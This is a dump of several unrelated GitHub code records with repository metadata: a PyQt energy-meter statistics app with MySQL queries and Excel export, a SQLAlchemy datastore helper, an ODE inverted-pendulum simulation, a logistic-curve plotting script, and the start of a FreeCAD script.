self.action_about.triggered.connect(self.viewDialogAbout)\n self.action_about.setIcon(QIcon(\"img/about2.svg\")) \n\n self.date = self.getDate(date=datetime.now().strftime(\"%Y%m%d\"), day=-1)\n self.dateChangeMonth = self.date\n self.dateChangeYear = self.date\n self.datebef = self.getDate(date=datetime.now().strftime(\"%Y%m%d\"), day=-2)\n\n\n self.reCalculate()\n self.updateUI()\n self.calendarWidget.setMinimumDate(QDate(2017, 4, 1))\n self.calendarWidget.setSelectedDate(datetime.strptime(self.date, \"%Y%m%d\"))\n self.calendarWidget.selectionChanged.connect(self.dateChanged)\n self.pushButton_loadfile.clicked.connect(self.loadFile)\n self.pushButton_savefile.clicked.connect(self.saveFile)\n self.pushButton_update.clicked.connect(self.updateAll)\n self.pushButton_datenow.clicked.connect(self.dateSetNow)\n self.errorDialogView = errorDialogUI()\n iconErrorPixmap = QPixmap( pathImage + '/' + \"error2.png\" )\n self.errorDialogView.label_icon.setPixmap(iconErrorPixmap)\n self.errorDialogView.pushButton_ok.clicked.connect(self.errorDialogView.close)\n self.okDialogView = okDialogUI()\n iconOKPixmap = QPixmap( pathImage + '/' + \"ok2.png\" )\n self.okDialogView.label_icon.setPixmap(iconOKPixmap)\n self.okDialogView.pushButton_ok.clicked.connect(self.okDialogView.close)\n self.widget_day = None\n self.widget_month = None\n self.widget_year = None\n if os.path.isfile(confile):\n with open(confile) as confjson:\n try:\n self.conf = json.load(confjson)\n except:\n pass\n else:\n self.conf = {}\n self.conf['pathopen'] = '/home'\n self.conf['pathsave'] = '/home'\n\n self.plotDay()\n self.plotMonth()\n self.plotYear()\n \n \n self.okDialogView = okDialogUI()\n iconOKPixmap = QPixmap( pathImage + '/' + \"ok2.png\" )\n self.okDialogView.label_icon.setPixmap(iconOKPixmap)\n self.okDialogView.pushButton_ok.clicked.connect(self.okDialogView.close)\n\n \n# ===================================================================================== defs\n def plotDay(self):\n self.getDayHours(self.date)\n \n if self.widget_day:\n self.widget_day.plotClear()\n else:\n self.widget_day = MatplotlibWidget(self.pltWidget_day, ylabel='кВт/г', dpi=80)\n self.widget_day.setGeometry(QtCore.QRect(-80, 0, 1200, 560))\n if sum(self.h2powers) > 0:\n self.widget_day.plotData(h2hour_label, self.h2powers, rotation=True)\n else:\n zerodata = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\n self.widget_day.plotData(h2hour_label, zerodata, rotation=True)\n\n\n def plotMonth(self):\n days = self.getMonthDays(self.date)\n xdate = []\n ypower = []\n for day in days:\n# xdate.append(day['date'].strftime(\"%d.%m\"))\n xdate.append(day['date'][:2])\n ypower.append(day['power'])\n if self.widget_month:\n self.widget_month.plotClear()\n else:\n self.widget_month = MatplotlibWidget(self.pltWidget_month, ylabel='кВт/г', dpi=80)\n self.widget_month.setGeometry(QtCore.QRect(-80, 0, 1200, 560))\n if sum(ypower) > 0:\n self.widget_month.plotData(xdate,ypower)\n else:\n zerodata = []\n for i in range (0,len(xdate)):\n zerodata.append(0)\n self.widget_month.plotData(xdate, zerodata)\n \n\n def plotYear(self):\n ypowerMin1 = []\n xlabel = []\n ypower = []\n dateYear = self.date[:4]\n dateYearMin1 = \"%04.d\" % (float(self.date[:4]) - 1)\n for month in range (1,13):\n apowerMonth = 0\n monthText = \"%02.d\" % month\n xlabel.append(\"%s\" % monthText)\n powerMonthdb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE `apowercnt` > '0' AND YEAR(date) = ('\"+ str(dateYear) +\"') AND MONTH(date) = ('\"+ str(month) +\"') ORDER BY date DESC LIMIT 0,1\")\n powerMonthdbMin1 = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE `apowercnt` > '0' AND YEAR(date) = ('\"+ str(dateYearMin1) +\"') AND MONTH(date) = ('\"+ str(month) +\"') ORDER BY date DESC LIMIT 0,1\")\n\n datedef=self.getMonth(date=\"%s%02.d%02.d\" % (dateYear, month, 1), month=-1)\n powerMonthBefdb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE `apowercnt` > '0' AND YEAR(date) = YEAR('\"+ datedef +\"') AND MONTH(date) = MONTH('\"+ datedef +\"') ORDER BY date DESC LIMIT 0,1\") \n datedefMin1=self.getMonth(date=\"%s%02.d%02.d\" % (dateYearMin1, month, 1), month=-1)\n powerMonthBefdbMin1 = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE `apowercnt` > '0' AND YEAR(date) = YEAR('\"+ datedefMin1 +\"') AND MONTH(date) = MONTH('\"+ datedefMin1 +\"') ORDER BY date DESC LIMIT 0,1\") \n\n if powerMonthdb and powerMonthBefdb:\n if powerMonthdb[0][1] > 0 and powerMonthBefdb[0][1] > 0:\n apowerMonth = powerMonthdb[0][1] - powerMonthBefdb[0][1]\n else:\n apowerMonth = 0\n else:\n apowerMonth = 0\n ypower.append(apowerMonth)\n\n if powerMonthdbMin1 and powerMonthBefdbMin1:\n if powerMonthdbMin1[0][1] > 0 and powerMonthBefdbMin1[0][1] > 0:\n apowerMonthMin1 = powerMonthdbMin1[0][1] - powerMonthBefdbMin1[0][1]\n else:\n apowerMonthMin1 = 0\n else:\n apowerMonthMin1 = 0\n ypowerMin1.append(apowerMonthMin1)\n\n if self.widget_year:\n self.widget_year.plotClear()\n else:\n self.widget_year = MatplotlibWidgetDiff(self.pltWidget_year, ylabel='кВт/г', dpi=80)\n self.widget_year.setGeometry(QtCore.QRect(-80, 0, 1200, 560))\n if sum(ypower) > 0 and sum(ypowerMin1) > 0:\n self.widget_year.plotData(months_label, ypower, ypowerMin1, dateYear, dateYearMin1)\n else:\n zerodata = [0,0,0,0,0,0,0,0,0,0,0,0]\n self.widget_year.plotData(months_label, zerodata, zerodata, '', '')\n\n\n def getDayHours(self, date=None):\n if date:\n today = datetime.strptime(date, \"%Y%m%d\")\n todaydb = datetime.strptime(date, \"%Y%m%d\").strftime(\"%Y-%m-%d\")\n else:\n today = datetime.now()\n todaydb = today.strftime(\"%Y-%m-%d\")\n# print(todaydb)\n h2powerstr = self.sql(\"SELECT `h2apower` FROM \"+ mysql_tbl +\" WHERE `date` = '\"+ todaydb +\"' LIMIT 0,1\")\n if h2powerstr:\n h2powerstr = h2powerstr[0][0]\n else:\n h2powerstr = ':0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:'\n h2powers = h2powerstr.split(':')\n h2powers = h2powers[1:-1]\n self.h2powers = []\n for h2power in h2powers:\n h2power = float(h2power)\n self.h2powers.append(h2power)\n \n\n def getMonthDays(self, date=None):\n if date:\n today = datetime.strptime(date, \"%Y%m%d\").strftime(\"%Y%m%d\")\n todaydb = datetime.strptime(date, \"%Y%m%d\").strftime(\"%Y-%m\")\n todayMonth = datetime.strptime(date, \"%Y%m%d\").strftime(\"%m\")\n monthdays = self.getDaysOfMonth(today)\n lastdaybefmonth = self.getLastDateOfMonth(date=self.getMonth(date=today, month=-1))\n lastdaybefmonthdb = datetime.strptime(lastdaybefmonth, \"%Y%m%d\").strftime(\"%Y-%m-%d\")\n days = []\n for monthday in range(1, monthdays+1):\n monthdaydb = \"%02d\" % monthday\n power = 0\n daydb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE `date` = '\"+ todaydb +\"-\"+ monthdaydb +\"' LIMIT 0,1\")\n if daydb:\n power = daydb[0][4]\n dateLabel = \"%s.%s\" % (monthdaydb, todayMonth)\n days.append({'date': dateLabel, 'power': power})\n return days\n\n\n def getLastDateOfMonth(self, date=None):\n date2 = datetime.strptime(date, \"%Y%m%d\")\n lastday = monthrange(date2.year, date2.month)[1]\n lastdate = datetime.strptime(\"%s%s%s\" % (date2.year, date2.month, lastday), \"%Y%m%d\").strftime(\"%Y%m%d\")\n return lastdate\n \n\n def getDaysOfMonth(self, date=None):\n if not date:\n date = datetime.now()\n else:\n date = datetime.strptime(date, \"%Y%m%d\")\n days = monthrange(date.year, date.month)\n return days[1]\n\n\n def getMonth(self, date=None, month=None):\n date = datetime.strptime(date, \"%Y%m%d\")\n date_after_month = date + relativedelta(months=month)\n date_after_month = datetime.strftime(date_after_month, \"%Y%m%d\")\n return date_after_month\n\n\n def getDate(self, date_format = '%Y%m%d', date = None, day = 0):\n if date:\n today = datetime.strptime(date, \"%Y%m%d\")\n else:\n today = datetime.now()\n result = today + timedelta(days=day)\n return result.strftime(date_format)\n \n \n def saveConf(self):\n with open(confile, 'w') as confilejson:\n json.dump(self.conf, confilejson)\n\n\n# ====================================================================================== Load File\n def loadFile(self):\n pathfull, _ = QtWidgets.QFileDialog.getOpenFileName(None, 'Вибрати файл для заванаження до бази', self.conf['pathopen'], \"Nikotex_*.txt ( Nikotex_*.txt Nikotex_*.TXT)\")\n if pathfull != '':\n pathfile, filenamefull = os.path.split(pathfull)\n filename = os.path.splitext(filenamefull)[0]\n self.conf['pathopen'] = pathfull\n lef = loadEnergoFiles()\n try:\n lef.loadfile(pathfull)\n self.saveConf()\n self.updateAll()\n self.statusBar().showMessage(\"Файл завантажено\", 10000)\n self.okDialogView.label_mess.setText(\"Файл завантажено.\")\n self.okDialogView.exec_()\n except:\n self.statusBar().showMessage(\"Помилка!\", 10000)\n self.errorDialogView.label_mess.setText('Помилка!')\n\n\n\n def saveFile(self):\n \n if self.power['apowerMonth'] > 0 or self.power['rpowerMonth'] > 0 or self.power['gpowerMonth'] > 0:\n pathfull, _ = QtWidgets.QFileDialog.getSaveFileName(None, \"Зберегти АКТ\", \"%s.xlsx\" % self.conf['pathsave'], \"XLS (*.xlsx *.XLSX)\")\n if pathfull != '':\n pathfile, filenamefull = os.path.split(pathfull)\n filename = os.path.splitext(filenamefull)[0]\n self.conf['pathsave'] = \"%s/%s\" % (pathfile, filename)\n self.saveConf()\n\n datenow = datetime.now().strftime(\"%Y%m%d\")\n datenowTextTop = \"%s %sр.\" % (months_xls[int(datenow[4:6])], datenow[:4])\n datenowTextBottom = \"\\\"%s\\\" %s %sр.\" % (datenow[6:8], months_xlsR[int(datenow[4:6])], datenow[:4])\n xls = openpyxl.load_workbook(filename = \"template.xlsx\")\n xlslist = xls['energo']\n xlslist['E4'] = datenowTextTop\n xlslist['B21'] = datenowTextBottom\n \n xlslist['E11'] = \"%.4f\" % (self.power['apowerMonthCnt'] / CounterCoeff)\n xlslist['E13'] = \"%.4f\" % (self.power['rpowerMonthCnt'] / CounterCoeff)\n xlslist['E15'] = \"%.4f\" % (self.power['gpowerMonthCnt'] / CounterCoeff)\n \n xlslist['F11'] = \"%.4f\" % (self.power['apowerMonthCntBef'] / CounterCoeff)\n xlslist['F13'] = \"%.4f\" % (self.power['rpowerMonthCntBef'] / CounterCoeff)\n xlslist['F15'] = \"%.4f\" % (self.power['gpowerMonthCntBef'] / CounterCoeff)\n\n xlslist['F11'] = \"%.4f\" % (self.power['apowerMonthCntBef'] / CounterCoeff)\n xlslist['F13'] = \"%.4f\" % (self.power['rpowerMonthCntBef'] / CounterCoeff)\n xlslist['F15'] = \"%.4f\" % (self.power['gpowerMonthCntBef'] / CounterCoeff)\n\n xlslist['G11'] = \"%.4f\" % (self.power['apowerMonth'] / CounterCoeff)\n xlslist['G13'] = \"%.4f\" % (self.power['rpowerMonth'] / CounterCoeff)\n xlslist['G15'] = \"%.4f\" % (self.power['gpowerMonth'] / CounterCoeff)\n\n xlslist['I11'] = \"%.0f\" % self.power['apowerMonth']\n xlslist['I13'] = \"%.0f\" % self.power['rpowerMonth']\n xlslist['I15'] = \"%.0f\" % self.power['gpowerMonth']\n\n xls.save(\"%s/%s.xlsx\" % (pathfile, filename))\n self.statusBar().showMessage(\"Файл \\\"%s.xlsx\\\" збережено\" % filename, 10000)\n else:\n self.statusBar().showMessage(\"Нема що зберігати! Нема данних за місяць.\", 10000)\n self.errorDialogView.label_mess.setText('Нема що зберігати!\\n\\nНема данних за місяць.')\n self.errorDialogView.exec_()\n\n\n\n def dateSetNow(self):\n self.date = self.getDate(date=datetime.now().strftime(\"%Y%m%d\"), day=-1)\n date = datetime.strptime(self.date, \"%Y%m%d\")\n self.calendarWidget.setSelectedDate(date)\n self.updateAll()\n\n\n def updateAll(self):\n self.reCalculate()\n self.updateUI()\n self.plotDay()\n self.plotMonth()\n self.plotYear()\n\n\n def dateChanged(self):\n self.date = self.calendarWidget.selectedDate().toString(\"yyyyMMdd\")\n# print(self.date)\n self.reCalculate()\n self.updateUI()\n self.plotDay()\n if self.date[:6] != self.dateChangeMonth[:6]:\n self.dateChangeMonth = self.date\n self.plotMonth()\n if self.date[:4] != self.dateChangeYear[:4]:\n self.dateChangeYear = self.date\n self.plotYear()\n\n\n def updateUI(self):\n self.lineEdit_apowerDay.setText(\"%.0f\" % self.power['apowerDay'])\n self.lineEdit_rpowerDay.setText(\"%.0f\" % self.power['rpowerDay'])\n self.lineEdit_gpowerDay.setText(\"%.0f\" % self.power['gpowerDay'])\n self.lineEdit_apowerMonth.setText(\"%.0f\" % self.power['apowerMonth'])\n self.lineEdit_rpowerMonth.setText(\"%.0f\" % self.power['rpowerMonth'])\n self.lineEdit_gpowerMonth.setText(\"%.0f\" % self.power['gpowerMonth'])\n self.lineEdit_apowerYear.setText(\"%.0f\" % self.power['apowerYear'])\n self.lineEdit_rpowerYear.setText(\"%.0f\" % self.power['rpowerYear'])\n self.lineEdit_gpowerYear.setText(\"%.0f\" % self.power['gpowerYear'])\n self.lineEdit_apowerCnt.setText(\"%.0f\" % self.power['apowerCnt'])\n self.lineEdit_rpowerCnt.setText(\"%.0f\" % self.power['rpowerCnt'])\n self.lineEdit_gpowerCnt.setText(\"%.0f\" % self.power['gpowerCnt'])\n \n\n def reCalculate(self):\n self.power = {}\n self.datebef = self.getDate(date=self.date, day=-1)\n powerdb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE `date` = '\"+ self.date +\"' LIMIT 0,1\")\n if powerdb:\n self.power['apowerCnt'] = powerdb[0][1]\n self.power['rpowerCnt'] = powerdb[0][2]\n self.power['gpowerCnt'] = powerdb[0][3]\n self.power['apowerDay'] = powerdb[0][4]\n self.power['rpowerDay'] = powerdb[0][5]\n self.power['gpowerDay'] = powerdb[0][6]\n else:\n self.power['apowerCnt'] = 0\n self.power['rpowerCnt'] = 0\n self.power['gpowerCnt'] = 0\n self.power['apowerDay'] = 0\n self.power['rpowerDay'] = 0\n self.power['gpowerDay'] = 0\n LastDateBefOfMonth = self.getLastDateOfMonth(date=self.getMonth(date=self.date, month=-1))\n\n powerLastDateBefOfMonthdb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE MONTH(date) = MONTH('\"+ LastDateBefOfMonth +\"') AND YEAR(date) = YEAR('\"+ LastDateBefOfMonth +\"') ORDER BY date DESC LIMIT 0,1\")\n powerLastDateOfMonthdb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE MONTH(date) = MONTH('\"+ self.date +\"') AND YEAR(date) = YEAR('\"+ self.date +\"') ORDER BY date DESC LIMIT 0,1\")\n\n if powerLastDateOfMonthdb and powerLastDateBefOfMonthdb:\n if powerLastDateOfMonthdb[0][1] > 0 and powerLastDateBefOfMonthdb[0][1] > 0:\n self.power['apowerMonth'] = powerLastDateOfMonthdb[0][1] - powerLastDateBefOfMonthdb[0][1]\n self.power['apowerMonthCnt'] = powerLastDateOfMonthdb[0][1]\n self.power['apowerMonthCntBef'] = powerLastDateBefOfMonthdb[0][1]\n else:\n self.power['apowerMonth'] = 0\n self.power['apowerMonthBef'] = 0\n\n if powerLastDateOfMonthdb[0][2] > 0 and powerLastDateBefOfMonthdb[0][2] > 0:\n self.power['rpowerMonth'] = powerLastDateOfMonthdb[0][2] - powerLastDateBefOfMonthdb[0][2]\n self.power['rpowerMonthCnt'] = powerLastDateOfMonthdb[0][2]\n self.power['rpowerMonthCntBef'] = powerLastDateBefOfMonthdb[0][2]\n else:\n self.power['rpowerMonth'] = 0\n self.power['rpowerMonthCnt'] = 0\n self.power['rpowerMonthBef'] = 0\n\n if powerLastDateOfMonthdb[0][3] > 0 and powerLastDateBefOfMonthdb[0][3] > 0:\n self.power['gpowerMonth'] = powerLastDateOfMonthdb[0][3] - powerLastDateBefOfMonthdb[0][3]\n self.power['gpowerMonthCnt'] = powerLastDateOfMonthdb[0][3]\n self.power['gpowerMonthCntBef'] = powerLastDateBefOfMonthdb[0][3]\n else:\n self.power['gpowerMonth'] = 0\n self.power['gpowerMonthCnt'] = 0\n self.power['gpowerMonthCntBef'] = 0\n else:\n self.power['apowerMonth'] = 0\n self.power['rpowerMonth'] = 0\n self.power['gpowerMonth'] = 0\n self.power['apowerMonthCnt'] = 0\n self.power['rpowerMonthCnt'] = 0\n self.power['gpowerMonthCnt'] = 0\n self.power['apowerMonthCntBef'] = 0\n self.power['rpowerMonthCntBef'] = 0\n self.power['gpowerMonthCntBef'] = 0\n\n# ======================================================================== за год\n dateBefYear = str(float(self.date[:4]) - 1)\n\n powerBefYeardb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE YEAR(date) = ('\"+ dateBefYear +\"') ORDER BY date DESC LIMIT 0,1\")\n powerYeardb = self.sql(\"SELECT * FROM \"+ mysql_tbl +\" WHERE YEAR(date) = ('\"+ self.date[:4] +\"') ORDER BY date DESC LIMIT 0,1\")\n if powerYeardb and powerBefYeardb:\n if powerYeardb[0][1] > 0 and powerBefYeardb[0][1] > 0:\n self.power['apowerYear'] = powerYeardb[0][1] - powerBefYeardb[0][1]\n else:\n self.power['apowerYear'] = 0\n\n if powerYeardb[0][2] > 0 and powerBefYeardb[0][2] > 0:\n self.power['rpowerYear'] = powerYeardb[0][2] - powerBefYeardb[0][2]\n else:\n self.power['rpowerYear'] = 0\n\n if powerYeardb[0][3] > 0 and powerBefYeardb[0][3] > 0:\n self.power['gpowerYear'] = powerYeardb[0][3] - powerBefYeardb[0][3]\n else:\n self.power['gpowerYear'] = 0\n else:\n self.power['apowerYear'] = 0\n self.power['rpowerYear'] = 0\n self.power['gpowerYear'] = 0\n\n\n def viewDialogAbout(self):\n aboutDialogView = aboutDialogUI()\n iconPixmap = QPixmap( pathImage + '/' + \"about2.png\" )\n aboutDialogView.label.setPixmap(iconPixmap)\n aboutDialogView.pushButton_ok.clicked.connect(aboutDialogView.close)\n aboutDialogView.exec_()\n \n \n def sql(self, req):\n if not self.sqlcon:\n if os.name == 'nt':\n self.sqlcon = mysql.connector.connect(host=mysql_host, user=mysql_user, password=mysql_pass, database=mysql_db)\n else:\n self.sqlcon = pymysql.connect(host=mysql_host, user=mysql_user, passwd=mysql_pass, db=mysql_db)\n with self.sqlcon:\n if os.name == 'nt':\n self.sqlcon.reconnect()\n cur = self.sqlcon.cursor()\n cur.execute(req)\n result = cur.fetchall()\n #cur.close()\n #self.sqlcon.close()\n return result\n \n\n def appquit(self, _):\n# self.sqlcon.close()\n sys.exit()\n\n\nif __name__ == '__main__':\n import sys\n app = QApplication(sys.argv)\n w = MAIN()\n w.show()\n sys.exit(app.exec_())\n","repo_name":"juf00th/aEnergo.stat","sub_path":"aENERGO.stat.py","file_name":"aENERGO.stat.py","file_ext":"py","file_size_in_byte":29330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10578584066","text":"\"\"\"\nDatastore transaction methods\n\"\"\"\n\nfrom functools import lru_cache\n\nfrom sqlalchemy.sql import text, case\n# from pandas import read_sql\n\n\nfrom errors import RebalancerError\n\n\ndef count_records(session, model, **kwargs):\n record_count = session.query(model).filter_by(**kwargs).count()\n return record_count\n\n\ndef retrieve_records(session, model, **kwargs):\n instances = session.query(model).filter_by(**kwargs).order_by(\n model.rid).all()\n return instances\n\n\ndef retrieve_records_ordered_by_code(session, model, **kwargs):\n instances = session.query(model).filter_by(**kwargs).order_by(\n model.code).all()\n return instances\n\n\ndef insert(session, model, **kwargs):\n instance = model(**kwargs)\n session.add(instance)\n return instance\n\n\ndef create_code_idx(session, model, **kwargs):\n records = retrieve_records(\n session, model, **kwargs)\n branch_idx = {x.code: x.rid for x in records}\n\n return branch_idx\n\n\ndef retrieve_record(session, model, **kwargs):\n instance = session.query(model).filter_by(**kwargs).first()\n return instance\n\n\n@lru_cache(maxsize=32)\ndef retrieve_record_cached(session, model, **kwargs):\n instance = session.query(model).filter_by(**kwargs).first()\n return instance\n\n\ndef update_record(session, model, rid, **kwargs):\n instance = session.query(model).filter_by(rid=rid).one()\n for key, value in kwargs.items():\n setattr(instance, key, value)\n\n# def insert_or_ignore(session, model, **kwargs):\n# instance = session.query(model).filter_by(**kwargs).first()\n# if not instance:\n# instance = model(**kwargs)\n# session.add(instance)\n# return instance\n\n\n# def delete_record(session, model, **kwargs):\n# instance = session.query(model).filter_by(**kwargs).one()\n# session.delete(instance)\n\n\n# def insert_or_update(session, model, rid, **kwargs):\n# instance = session.query(model).filter_by(rid=rid).first()\n# if not instance:\n# instance = model(**kwargs)\n# session.add(instance)\n# else:\n# del kwargs['sid']\n# update_record(session, model, rid, **kwargs)\n\n\n# def retrieve_records(session, model, **kwargs):\n# instances = session.query(model).filter_by(**kwargs).order_by(\n# model.rid).all()\n# return instances\n\n\n# def retrieve_last_record(session, model):\n# instance = session.query(model).order_by(model.rid.desc()).first()\n# return instance\n\ndef world_lang_query_stmn(system_id, lang_code):\n stmn = f\"\"\"\n SELECT overflow_item.rid as rid,\n overflow_item.item_id as iid,\n overflow_item.bib_id as bid,\n overflow_item.title as title,\n overflow_item.author as author,\n overflow_item.call_no as call_no,\n overflow_item.pub_date as pub_date,\n branch.code as branch,\n mat_cat.code as mat_cat,\n audience.code as audn,\n language.code as lang\n FROM overflow_item\n JOIN branch ON overflow_item.src_branch_id = branch.rid\n JOIN mat_cat ON overflow_item.mat_cat_id = mat_cat.rid\n JOIN audience ON overflow_item.audn_id = audience.rid\n JOIN language ON overflow_item.lang_id = language.rid\n WHERE overflow_item.cart_id IS NULL\n AND overflow_item.system_id=:system_id\n AND language.code=:lang_code\n ORDER BY call_no, author, title;\n \"\"\"\n stmn = text(stmn)\n stmn = stmn.bindparams(\n system_id=system_id,\n lang_code=lang_code)\n return stmn\n\n\ndef english_query_stmn(system_id, audn_id, mat_cat_id):\n stmn = f\"\"\"\n SELECT overflow_item.rid as rid,\n overflow_item.item_id as iid,\n overflow_item.bib_id as bid,\n overflow_item.title as title,\n overflow_item.author as author,\n overflow_item.call_no as call_no,\n overflow_item.pub_date as pub_date,\n branch.code as branch,\n mat_cat.code as mat_cat,\n audience.code as audn,\n language.code as lang\n FROM overflow_item\n JOIN branch ON overflow_item.src_branch_id = branch.rid\n JOIN mat_cat ON overflow_item.mat_cat_id = mat_cat.rid\n JOIN audience ON overflow_item.audn_id = audience.rid\n JOIN language ON overflow_item.lang_id = language.rid\n WHERE overflow_item.cart_id IS NULL\n AND overflow_item.system_id=:system_id\n AND mat_cat.rid=:mat_cat_id\n AND audience.rid=:audn_id\n AND language.code='eng'\n ORDER BY call_no, author, title;\n \"\"\"\n\n stmn = text(stmn)\n stmn = stmn.bindparams(\n system_id=system_id,\n mat_cat_id=mat_cat_id,\n audn_id=audn_id)\n return stmn\n\n\ndef get_relevant_lang_recs(session, system_id):\n stmn = f\"\"\"\n SELECT DISTINCT language.rid, language.code, language.label\n FROM language\n JOIN overflow_item ON language.rid = overflow_item.lang_id\n WHERE overflow_item.system_id=:system_id\n AND overflow_item.cart_id IS NULL\n AND language.code <> 'eng'\n ORDER BY language.code\n \"\"\"\n stmn = text(stmn)\n stmn = stmn.bindparams(\n system_id=system_id)\n instances = session.execute(stmn)\n lang_recs = [(c.rid, c.code, c.label) for c in instances]\n return lang_recs\n\n\ndef get_items4cart(session, system_id, audn_id, mat_cat_id, lang_code):\n if lang_code == 'eng':\n # English materials\n stmn = english_query_stmn(system_id, audn_id, mat_cat_id)\n else:\n # world languages\n stmn = world_lang_query_stmn(system_id, lang_code)\n\n instances = session.execute(stmn)\n return instances\n","repo_name":"BookOps-CAT/rebalancer","sub_path":"rebalancer/datastore_transactions.py","file_name":"datastore_transactions.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74375870762","text":"#!/usr/bin/python\n# -*- Encoding: utf-8 -*-\n\n# This is a simulation of an inverted pendulum through ode.\n# A controller allows changing the torque at the joint of the\n# rod with the world.\n#\n# Dov Grobgeld \n# 2013-02-11 Mon\n\nimport Euv.Frame as Frame\nimport Euv.EuvGtk as Euv\nimport Euv.Color as Color\nimport Euv.Shapes as Shapes\nimport ode\nimport time\nimport math\n\ndef normalize_angle(theta):\n return math.atan2(math.sin(theta),math.cos(theta))\n\n# Create the world through ode\nworld = ode.World()\nworld.setGravity( (0,-1,0) )\n\n# Make a heavy ball\nball = ode.Body(world)\nM = ode.Mass()\nM.setSphere(1000,0.01)\nM.mass = 1.0\nball.setMass(M)\nball.setPosition((0,1,0))\n\n# And a rod without any weight\nrod = ode.Body(world)\nM = ode.Mass()\nM.setCylinder(0.01, 2, 0.01,1)\nM.mass = 1e-3\nrod.setMass(M)\nrod.setPosition((0,0.5,0))\n\n# Connect the rod with the world through a Hinge joint.\nworld_joint = ode.HingeJoint(world)\nworld_joint.attach(rod, ode.environment)\nworld_joint.setAnchor( (0,0,0) )\nworld_joint.setAxis((0,0,1))\n\n# Connect rod with ball with a fixed joint\nrod_ball_joint = ode.FixedJoint(world)\nrod_ball_joint.attach(rod, ball)\nrod_ball_joint.setFixed()\n\n# Create the viewer window\nviewer = Euv.Viewer(size=(600,600),\n view_port_center = (0,0),\n view_port_width = 2.5,\n flip_y = True\n )\n\n# Do the simulation\n\ntotal_time = 0.0\ndt = 0.02\nKf = 0.5 # Friction force\nwhile total_time<30:\n\n # push the ball after half a second!\n if total_time >= 0.5 and total_time < 0.5+dt:\n ball.addRelForce( (-20,0,0) )\n elif total_time >= 0.5+dt and total_time < 0.5*2*dt:\n ball.addRelForce( (20,0,0) )\n\n\n angle = world_joint.getAngle()\n angle_rate_of_change = world_joint.getAngleRate()\n\n # Friction\n friction_force = -angle_rate_of_change * Kf\n\n # Control the pendulum by applying a torque at the world\n # pendulum joint.\n\n # Try with different PD parameters to explore stability of the Pendulum!\n Kp = 5\n Kd = 5\n torque = -angle * Kp - angle_rate_of_change * Kd + friction_force\n\n # Here is the control feedback\n world_joint.addTorque(torque)\n\n # Show text, the rod, and the ball\n f = Frame.Frame()\n f.add_text(pos=(-0.9,0.5),\n face='Serif 18',\n scale=0.003,\n markup=(u\"Time=%.2fs\\n\"\n u\"φ=%.2f\\n\"\n u\"ω=%.2f\\n\"\n u\"τ=%.2f\\n\"\n u\"Kp=%.2f\\n\"\n u\"Kd=%.2f\\n\"\n ) %\n (total_time, angle, angle_rate_of_change, torque, Kp, Kd),\n color=Color.Color(\"darkgreen\"))\n\n x,y,z = rod.getPosition()\n rod_shape = Shapes.rotated_rectangle( (x,y),\n angle,\n 0.03,\n 1)\n f.add_polygons([rod_shape],\n color=\"gray50\")\n\n x,y,z = ball.getPosition()\n f.add_circle((x,y),\n color='red3',\n alpha=0.8,\n radius=0.1)\n\n viewer.add_frame(f)\n time.sleep(0.01)\n\n # Step the world\n world.step(dt)\n total_time+=dt\n \nviewer.wait()\n","repo_name":"dov/dov-conrob","sub_path":"inverted-pendulum.py","file_name":"inverted-pendulum.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10075008094","text":"##-*- coding:utf-8 -*-\nimport logging\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nlogging.basicConfig(level=logging.DEBUG,#控制台打印的日志级别\n filename='test.txt',\n filemode='w',##模式,有w和a,w就是写模式,每次都会重新写日志,覆盖之前的日志\n #a是追加模式,默认如果不写的话,就是追加模式\n format=\n '%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'\n #日志格式\n )\n# K1:期望水平,A1:最小性能水平, B1:变形斜率,x1:变形位置参数\nA1 = 20\nK1 = 50\nB1 = 0.5\nx1 = 25\nA2 = 20\nK2 = 40\nB2 = 0.5\nx2 = 70\nx = np.arange(0,70,2)\ndata = []\nfor item in x:\n y = A1 + (K1 - A1)/(1 + math.exp(B1 * (item - x1)))\n data.append(y)\n\nx_a= np.arange(70,120,2)\ndata1 = []\nfor item1 in x_a:\n y1 = A2 + (K2 - A2)/(1 + math.exp(-B2 * (item1 - x2)))\n data1.append(y1)\n\nx_t = np.append(x,x_a)\ndata_t = data + data1\n\nprint(\"data:%s\",str(data))\n\nplt.plot(x_t,data_t,marker=\"d\",color=\"r\")\nplt.xticks(fontsize=25)\nplt.yticks(fontsize=25)\nplt.legend()\nplt.show()\n\n\n","repo_name":"zhouxinxin19920802/Couzin_leader","sub_path":"test2/resilience.py","file_name":"resilience.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2624993910","text":"import sys\nimport FreeCAD\nimport os\nimport Part\n\nApp = FreeCAD\n\nin_gui = False\nif App.ActiveDocument:\n assert(App.ActiveDocument.Label == \"print\")\n in_gui = True\n\nif not in_gui:\n App.newDocument(\"print\")\n App.setActiveDocument(\"print\")\n\npp = []\n\nworkdir = os.path.dirname(__file__)\npart = \"x_carriage_plate\"\nPart.insert(f'{workdir}/{part}.brep', App.ActiveDocument.Name)\np = App.ActiveDocument.getObject(part)\nif p.ViewObject:\n p.ViewObject.Visibility = 